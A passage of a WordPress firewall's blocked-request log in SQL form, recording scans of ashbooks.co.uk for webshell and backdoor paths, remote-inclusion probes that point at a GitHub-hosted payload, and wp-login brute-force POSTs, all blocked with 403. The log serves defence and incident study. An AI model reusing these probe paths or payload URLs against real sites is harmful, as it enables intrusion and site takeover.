Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','P1GBto4EQ3Key8INnFqpwrAO',0,1637119708.5725,491,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Mfn0Qh7ePw5BIG9KxWc32mE6',0,1637119710.7225,426,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Kisj18kcodlqOvrCEQe7Py0N',0,1637119713.5414,497,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','FAuVWihSMeRs8f93GKXmNgBU',0,1637119714.8122,383,'','POST',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','DsL2VoNUlgp0a85ZG31wXxKe',0,1637119717.2971,330,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','NlMbUzpFL5xcVQT2B3jnsd0y',0,1637119718.9240,529,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','gxdcO5hXwURYTlpr4WMjfoCK',0,1637119721.0103,476,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','mza21FZP08MJGijcuH5kNtwl',0,1637119722.8485,523,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','j8xb47HI0lhDrfLWNJGcXCSz',0,1637119725.2123,562,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','WGhxZ7TzQriMp8CenEwuSaPF',0,1637119727.5813,564,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Vm3Fiwr75RzKNDhU2oWEnSLM',0,1637119729.6630,413,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','pNvhUTCkdAm9w3lbgQZ0tKOP',0,1637119731.5540,529,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','aVhoJcf5ejSY1TRPM3H4qyLD',0,1637119733.5497,542,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','gZK5f8mNDYbdVnjvBcr1HP4C',0,1637119735.5172,409,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','id6KS3yoCxqBlcGUHJ5XL4zW',0,1637119737.4057,522,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','nBijyH8wl2Q0MvSmk6GrJ5KD',0,1637119739.6998,423,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ugafOUlqQtLbc18725VerK6o',0,1637119741.8583,531,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','jbt2q70Qf6xNIzXJEPBgk53p',0,1637119743.6419,394,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Re7oauZPEKc5nflik3w9DMJr',0,1637119745.6020,569,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','9DFGjqJQ5ntLzINX4kV1Z7iO',0,1637119747.7463,330,'','GET',403,0,700,0,1,'',0),('204.12.198.245',3423389429,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','Kh1QzNyimJRcA9BotlGEIHv5',0,1637121726.6437,188,'','POST',403,0,600,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','PLkzpSiOg6GRQBx9undwaI7K',0,1637122160.9194,571,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8HVfW6UnyzA02sLIQ9rFKwmG',0,1637122163.0933,404,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','DqzJSHMEt70Y6lT23KgroacO',0,1637122165.5841,560,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sBo5jGn0rE9xKyeIM2kgqctS',0,1637122167.8302,433,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/index.php?3x=3x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','9SogbtKjnGBQc2ayIDHx0YNT',0,1637122170.5517,423,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','InvzNSATrq4oDtUJQ21ZWFw6',0,1637122178.7535,552,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','MuijvwfDCWH2VaJrcSmYNh1Q',0,1637122181.3199,606,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vGSfF7hKOqcty52A8kzexgX6',0,1637122183.9849,462,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','OsMEGJyrAcB2mTjlk9DCtuew',0,1637122186.5888,403,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','FrfjgquTl5z4eCcsYnw2yEP0',0,1637122191.2587,397,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6ya5zoFIcNAxGQjD4ipPMLBT',0,1637122194.2620,409,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','zoNxR8DFS7qfdeBUvV3IP1ZQ',0,1637122196.6590,411,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','OuisTD7nrZtKzMd1846Y3NLH',0,1637122199.4224,432,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','s9yaGEVfhgBk6wJHUZ0rDCqN',0,1637122202.0069,415,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','a0CSXO4DIyHPV5bq1TJijd2e',0,1637122215.3810,459,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','nuJL4UBFjb0z3VmKdqhlMrio',0,1637122240.7428,430,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','rWXCo8qh9bDRISTAs4BlUmJK',0,1637122248.1216,419,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','7pdKxV9utsOJkGib54SvjC2X',0,1637122251.3648,395,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','fIzYD4nvG7UeoQR31qSsKrMy',0,1637122254.2552,421,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','lBeyWgPEH8KCrpXxMu6thVIj',0,1637122256.6422,498,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','udgmPlRNxHZnQcTW6rsDXeFY',0,1637122259.2920,391,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Z9G2EDhiVgsfOX0a4jTm1Cr7',0,1637122261.4292,468,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','JTVkfMavtXAKPcroSu5RLZ2W',0,1637122264.1619,398,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','BAerR9zfxSpsJkdN5ctUEDX4',0,1637122267.0284,386,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','RCYgUQsNW9J2f1hdPEK8jv6F',0,1637122269.7180,432,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','g8YiL3Oqoc7prlAHCQR6KsnG',0,1637122272.2297,419,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','RivNy3TAI9hKPoVpdgmWJ8zn',0,1637122274.4030,438,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XJHTNLrqdicS418zmDMaRFYn',0,1637122275.9996,396,'','POST',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','o5MT8n3CLB0y2twZxvU69jiV',0,1637122278.0441,416,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','9kSRm6WDdzajPcboAJ3Mh4N1',0,1637122280.2445,415,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','9fFz4hmsjt6QTdM0oO1xRCVS',0,1637122282.8106,418,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','lQXma9AoIYdZ2ig8cGt7CuR0',0,1637122285.0462,444,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1uQwricaYVnXdJeP6ySUAWhF',0,1637122287.6636,400,'','GET',403,0,700,0,1,'',0),('192.187.127.21',3233513237,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','Rjl62xnoEztVSqhcNgWAfHZX',0,1637122288.1062,458,'','POST',403,0,600,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ZvsoiPjc2U5LQ3ztnWf0AJu6',0,1637122289.6008,426,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','QukEeY0zUt9fZ4g82pDXMJVL',0,1637122291.7735,436,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','tWwrSVID6FUx4iABdmPXzolK',0,1637122294.0527,387,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','FCwnM3H7isyLbUt2v6DBjKmE',0,1637122296.2628,439,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','zwG0aPeO43l6QC2DrsbdEWfR',0,1637122298.9396,410,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sGPVfQW0UyFwJnKuTBjAZlDr',0,1637122300.9297,428,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','l3NRVYEgCJxA9q84a7pZHjeQ',0,1637122302.9015,445,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','pVQzyHiDModanPmLc60jCWBR',0,1637122304.9280,445,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','MQJSaiqhCy50lXExU8AoOKtW',0,1637122307.0239,405,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','bJsHwhivan1SNGyfX4AFVQkT',0,1637122309.1785,394,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','TdyKm0hb93cvqXx5OVkipJ4u',0,1637122311.2579,411,'','GET',403,0,700,0,1,'',0),('107.150.48.236',1805005036,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit\\/538.46 (KHTML, like Gecko) Version\\/8.0 Safari\\/538.46\"}','8vV9iHlTQ74FpXh3LDIrGjeO',0,1637127408.5719,171,'','POST',403,0,600,0,1,'',0),('69.30.217.108',1159649644,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/534.59.10 (KHTML, like Gecko) Version\\/5.1.9 Safari\\/534.59.10\"}','69wFSKa2iObpPDMGLuYtvXrq',0,1637128030.3562,162,'','POST',403,0,600,0,1,'',0),('185.191.34.215',3116311255,'','https://ashbooks.co.uk/wp-admin/css/colors/light/colors.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','a2Fciq5QDJ4h0zA3jB8UuRxO',0,1637129901.5056,454,'','GET',403,0,700,0,1,'',0),('185.191.34.215',3116311255,'','https://ashbooks.co.uk/wp-admin/css/colors/light/colors.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','lAacBk3zv9hs4Ex6WH2CUOGT',0,1637129901.5043,465,'','GET',403,0,700,0,1,'',0),('69.30.240.27',1159655451,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko\\/20100101 Firefox\\/29.0\"}','OYAzjJ5489LtZVgEXSsITG0P',0,1637133610.4975,172,'','POST',403,0,600,0,1,'',0),('69.30.240.27',1159655451,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','2lj7JwQNvOFtnyKrT8fCX35U',0,1637134587.9648,167,'','POST',403,0,600,0,1,'',0),('192.187.118.205',3233511117,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','BGRTIjrPE7AqKemkODf92LNJ',0,1637138973.8404,182,'','POST',403,0,600,0,1,'',0),('185.191.34.215',3116311255,'','https://ashbooks.co.uk/wp-content/uploads/2019/index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko\\/20100101 